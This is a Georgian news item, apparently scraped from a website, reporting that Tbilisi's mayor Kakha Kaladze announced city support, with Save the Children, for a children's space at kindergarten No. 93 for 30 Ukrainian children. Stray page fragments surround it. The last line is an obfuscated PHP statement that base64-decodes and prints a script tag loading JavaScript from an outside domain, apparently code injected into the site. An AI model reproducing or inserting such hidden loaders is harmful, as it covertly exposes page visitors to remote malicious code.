celsiusi
ავერსი საქკაბელი
თბილისის მერიამ დედაქალაქში მცხოვრები უკრაინელი ბავშვებისთვის კიდევ ერთ ჰუმანიტარულ პროექტს უცხადებს მხარდაჭერას, – ამის შესახებ დედაქალაქის მთავრობის სხდომაზე თბილისის მერმა, კახა კალაძემ განაცხადა.
 
როგორც კახა კალაძემ აღნიშნა, თბილისის საბავშო ბაგა-ბაღების მართვის სააგენტოსა და ბავშვთა საკითხებზე მომუშავე საერთაშორისო ორგანზიაცია save the children-ის თანამშროლობით სასკოლო ასაკის 30 უკრაინელი ბავშვისთვის თბილისის 93-ე ბაღში კიდევ ერთი საბავშვო სივრცე მოეწყობა.
 
„ჩვენ ამ პროგრამას მხარს ვუჭერთ, ბევრი კარგი პროექტი იქნა განხორციელებული და ამ მიმართულებით ვაგრძელებთ მუშაობას. პროექტის საგანმანათლებლო სააღმზრდელო მიმართულებას მთლიანად უხელმძღვანელებს ორგანიზაცია save the children, რომელიც მოიწვევს უკრაინელ პედაგოგებს, ფსიქოლოგებსა და სპეცპედაგოგებს და იქირავებს ტექნიკურ პერსონალს, შეადგენს სასწავლო გეგმას და ა.შ. ხოლო ბაღების სააგენტო უზრუნველყოფს საგანმანათლებლო სივრცის მოწყობას, კომუნალური ხარჯების დაფარვასა და ბავშვების ოთხჯერად კვებას საქართველოს კანონმდებლობის დადგენილი სტანდარტის შესაბამისად. ძალიან მნიშვნელოვანი პროგრამა არის და ჩვენ გავაგრძელებთ ამ მხარდაჭერას. კიდევ ერთხელ მინდა, უკრაინას და უკრაინელ ხალხს ვუსურვო მშვიდობა, რაც ძალიან მნიშვნელოვანია“, – განაცხადა კახა კალაძემ.
 
 
 
 
527
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");